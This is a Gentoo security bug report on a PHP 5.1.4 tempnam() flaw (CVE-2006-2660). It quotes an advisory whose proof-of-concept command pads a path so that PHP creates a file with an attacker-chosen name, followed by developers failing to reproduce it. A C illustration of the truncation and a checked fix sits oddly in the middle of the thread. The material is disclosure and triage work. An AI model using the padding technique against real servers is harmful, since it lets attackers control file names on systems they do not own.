Bug 136566 - dev-lang/php <= 5.1.4 tempnam() Bypass unique file name (CVE-2006-2660)
Bug#: 136566
Product: Gentoo Security
Version: unspecified
Platform: All
OS/Version: Linux
Status: RESOLVED
Severity: normal
Priority: P2
Resolution: FIXED
Assigned To: security@gentoo.org
Reported By: stepp@atistar.net
Component: Vulnerabilities
URL: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2660
Summary: dev-lang/php <= 5.1.4 tempnam() Bypass unique file name (CVE-2006-2660)
Keywords:
Status Whiteboard: B4 [noglsa] jaervosz
Opened: 2006-06-12 11:41 0000
The CVE is under review, but it appears to be legitimate.
[tempnam() Bypass unique file name PHP 5.1.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 22.5.2006
-Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660
--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
tempnam -- Create file with unique file name.
--- 1. tempnam() Bypass unique file name ---
In my latest advisory I published an issue, "Open Basedir Bypass". The function
tempnam() requires 2 arguments.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
In PHP 5.1.4 there is a bug that allows you to create a file with any name.
---
cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";'
/www/temp/hacker.phpGQMqSE
---
You have created the file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically
added to the filename.
The problem exists because the path cannot be longer than MAXPATHLEN. By default
MAXPATHLEN is 1024 bytes.
--- lines 771-805 ---
PHP_FUNCTION(tempnam)
{
    zval **arg1, **arg2;
    char *d;
    char *opened_path;
    char *p;
    int fd;
    size_t p_len;

    if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
        WRONG_PARAM_COUNT;
    }
    convert_to_string_ex(arg1);
    convert_to_string_ex(arg2);

    /* dir (arg1) is checked against open_basedir, but its length is never checked */
    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }
    d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));

    /* prefix (arg2) is reduced to its basename and capped at 63 characters */
    php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len TSRMLS_CC);
    if (p_len > 64) {
        p[63] = '\0';
    }

    /* the unique suffix is appended inside php_open_temporary_fd() */
    if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) {
        close(fd);
        RETVAL_STRING(opened_path, 0);
    } else {
        RETVAL_FALSE;
    }
    efree(p);
    efree(d);
}
--- lines 771-805 ---
So if you create a path like /www/../www/.. etc. such that
arg1+arg2 = 1023,
the unique id is not appended to the path.
Example:
---
cxib# php -r 'echo
tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
www/../www/../www/../www/../www/../www/../www/temp/", "hacker.php")."\n";'
/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
www/../www/../www/temp/hacker.php
---
= /www/temp/hacker.php
---
cxib# ls -la /www/temp/hacker*
-rw------- 1 cxib cxib 0 May 22 23:33 /www/temp/hacker.php
-rw------- 1 cxib cxib 0 May 22 23:26 /www/temp/hacker.phpGQMqSE
---
--- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
--- 3. Greets ---
For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec ;]
--- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
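The truncation the advisory blames, modelled in C as an added illustration (this is neither PHP's own php_open_temporary_fd() nor the advisory's code): the unchecked builder shows how an over-long directory pushes the XXXXXX placeholder out of a MAXPATHLEN-sized buffer, and the checked builder rejects that case instead of passing it on. The 1024 constant, the function names and the padded-directory helper are assumptions of this model.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model: "dir/prefixXXXXXX" formatted into a MAXPATHLEN-sized
 * buffer. 1024 is the reporter's MAXPATHLEN; Linux PATH_MAX is 4096, which
 * matches the 4095/4096 cut-off the Gentoo testers observed. */
#define MODEL_MAXPATHLEN 1024

/* Does a template still carry the six-X placeholder that mkstemp randomises? */
int ends_with_placeholder(const char *tmpl)
{
    size_t len = strlen(tmpl);
    return len >= 6 && strcmp(tmpl + len - 6, "XXXXXX") == 0;
}

/* Unchecked construction: snprintf silently truncates, so a long enough
 * directory drops the XXXXXX and the final name is fully chosen by whoever
 * controlled dir and prefix. */
void build_template_unchecked(char *out, const char *dir, const char *prefix)
{
    snprintf(out, MODEL_MAXPATHLEN, "%s/%sXXXXXX", dir, prefix);
}

/* Hardened construction: any truncation, or a template that no longer ends
 * in XXXXXX, is an error. Returns 1 on success, 0 on rejection (out empty). */
int build_template_checked(char *out, const char *dir, const char *prefix)
{
    int n = snprintf(out, MODEL_MAXPATHLEN, "%s/%sXXXXXX", dir, prefix);
    if (n < 0 || (size_t)n >= MODEL_MAXPATHLEN || !ends_with_placeholder(out)) {
        out[0] = '\0';
        return 0;
    }
    return 1;
}

/* Constructed input: a directory string of exactly `len` bytes, padded with
 * "/www/.." segments and ending in "/www/temp" in the spirit of the PoC.
 * Caller frees the result; len must be at least strlen("/www/temp"). */
char *make_padded_dir(size_t len)
{
    const char *seg = "/www/..", *tail = "/www/temp";
    size_t pad = len - strlen(tail), i;
    char *d = malloc(len + 1);
    if (!d)
        return NULL;
    for (i = 0; i < pad; i++)
        d[i] = seg[i % strlen(seg)];
    memcpy(d + pad, tail, strlen(tail) + 1);
    return d;
}
```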
Tried the PoC on php-4.4.2-pl2, and it does not appear to work there, at least.
I do not have access to 5.1.4 at the moment.
Tried the PoC on a freshly installed 5.1.4. The cut-off point appears to be
4096, not 1024 (for me anyway).
As soon as the path goes over 4095 bytes, the temp file gets changed to
'/tmp/<filename><random>'.
So, I'm not sure under what conditions this is supposed to work.
I'll let someone else with more authority switch to INVALID, if that is the
case, however.
stepp: Isn't that the point? Bloat the filename and get a file handle you can
control?
No, perhaps I was unclear. The filename is still not controllable.
For example:
tempnam("/www/..< pad to 4095 total >/www/temp/","hacker123.php");
results in /www/temp/hacker123.php3I2fgH or something similar
tempnam("/www/..< pad to 4096 total >/www/temp/","hacker1234.php");
results in /tmp/hacker1234.php3I2fgH or something similar.
The random string at the end is still there.
Add PHP Team to CC.
Best regards, CHTEKK.
stepp: I must be stupid here, but that's how tempnam() is supposed to work.
Isn't the whole idea of the exploit to pad the directory with bloat until you
reach MAXPATHLEN-strlen(wantedfile), which would give you a controllable file
handle? At least that's what I see the exploit claims to do.
Ah, I got confused, obviously. So on your system the function falls back like
in the case when the directory doesn't exist? I'll try to confirm this here.
I just tried with 5.1.4 (x86) from portage and get the same result as Nigel
does (the function falls back to /tmp, and the random tail is still intact), so
I'd count it as INVALID.
I had already checked this issue before; I had chosen not to file a bug. I
would close it as "invalid" too.
What do we do here? Close or not? I can't reproduce it here either on any of my
systems, so closing it invalid seems right.
Best regards, CHTEKK.
I could neither and so I'd also suggest invalidating this one, unless anybody
steps up to say it worked for him/her.
Fixed in dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4. Upstream provided an
explicit patch for this (so they were able to reproduce it somehow), and it was
added to those releases.
Stabling of those two PHP versions can be handled in bug 133524.
Best regards, CHTEKK.
Seems like it is time for GLSA decision on this one as well.
invalid, IMHO, not reproducible on x86 at least. Other arches? Else I vote
"no".
Voting no, this bug is stupid. You don't give the untrusted party control over
the path in tempnam, it doesn't work, and the impact is lame.
yet another "no" and closing...